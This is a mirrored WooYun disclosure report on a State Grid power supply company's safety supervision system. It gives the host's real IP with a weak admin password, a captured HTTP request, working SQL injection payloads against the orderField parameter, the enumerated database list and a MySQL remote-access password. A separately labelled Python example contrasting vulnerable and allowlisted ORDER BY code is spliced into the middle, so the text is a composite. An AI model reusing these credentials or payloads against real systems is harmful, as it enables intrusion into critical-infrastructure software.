WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2016-01-15: Details have been sent to the vendor and are awaiting vendor handling
2016-01-15: Vendor has confirmed; details disclosed to the vendor only
2016-01-25: Details disclosed to core white hats and experts in related fields
2016-02-04: Details disclosed to regular white hats
2016-02-14: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public
Weak password on the safety supervision system of a State Grid power supply company
http://115.29.111.94:8080/ user: admin pass: 1
One SQL injection: the orderField parameter
POST /corerole/list.do HTTP/1.1
Host: 115.29.111.94:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://115.29.111.94:8080/index/index.do
Content-Length: 55
Cookie: JSESSIONID=1E1D54B77538A4DC13005A2646DC44E2
Connection: keep-alive

pageNum=1&numPerPage=15&orderField=&orderDirection=asc
---
Parameter: orderField (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: pageNum=1&numPerPage=15&orderField=(SELECT (CASE WHEN (5347=5347) THEN 5347 ELSE 5347*(SELECT 5347 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&orderDirection=asc

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace
    Payload: pageNum=1&numPerPage=15&orderField=(SELECT 3200 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT(ELT(3200=3200,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&orderDirection=asc
---
available databases [7]:
[*] benxi
[*] guoduo
[*] information_schema
[*] mianyang_tools
[*] mysql
[*] performance_schema
[*] shimen
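The injection lives in orderField because the value ends up inside an ORDER BY clause, where bind parameters cannot be used, so the application must validate the column name itself. The following is an added example (not code from the report or from the affected system) showing the vulnerable string-concatenation pattern next to an allowlist-based fix; the corerole table, its columns and the sample rows are assumptions.

```python
import sqlite3

# Allowlist of column names and directions the list endpoint may sort on
# (hypothetical schema standing in for the real /corerole/list.do backend).
SORTABLE_COLUMNS = {"id", "name", "created"}
DIRECTIONS = {"asc", "desc"}


def build_order_by_unsafe(order_field, order_direction):
    # Vulnerable pattern: request parameters are pasted straight into SQL text.
    # A subquery or CASE expression supplied as orderField is executed as-is,
    # which is exactly what the boolean-based and error-based payloads exploit.
    return f"SELECT id, name FROM corerole ORDER BY {order_field} {order_direction}"


def build_order_by_safe(order_field, order_direction, default="id"):
    # Hardened pattern: only a name from the fixed allowlist ever reaches the
    # SQL text; any other value (including injected expressions) falls back to
    # the default column, and the direction is likewise restricted to asc/desc.
    column = order_field if order_field in SORTABLE_COLUMNS else default
    direction = str(order_direction).lower()
    if direction not in DIRECTIONS:
        direction = "asc"
    return f"SELECT id, name FROM corerole ORDER BY {column} {direction}"


def run(sql):
    # Executes the query against a constructed in-memory table so the effect of
    # both builders can be observed offline.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE corerole (id INTEGER, name TEXT, created TEXT)")
    conn.executemany(
        "INSERT INTO corerole VALUES (?, ?, ?)",
        [(1, "auditor", "2016-01-01"), (2, "admin", "2016-01-02")],
    )
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    injected = "(CASE WHEN 1=1 THEN name ELSE id END)"
    print(build_order_by_unsafe(injected, "asc"))   # expression reaches the DB
    print(build_order_by_safe(injected, "asc"))     # falls back to ORDER BY id asc
    print(run(build_order_by_safe("name", "DESC")))
```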
MySQL remote (external) connections are enabled; the password is: cnksi.com
------Not sure whether this is the root password or whether it is shared with the injection point, but I couldn't find any other sites, so I'm submitting it under State Grid~
Contact customer service at www.cnksi.com
Severity: Low
Vulnerability Rank: 3
Confirmed at: 2016-01-15 16:11
Thank you for your attention to State Grid security!
None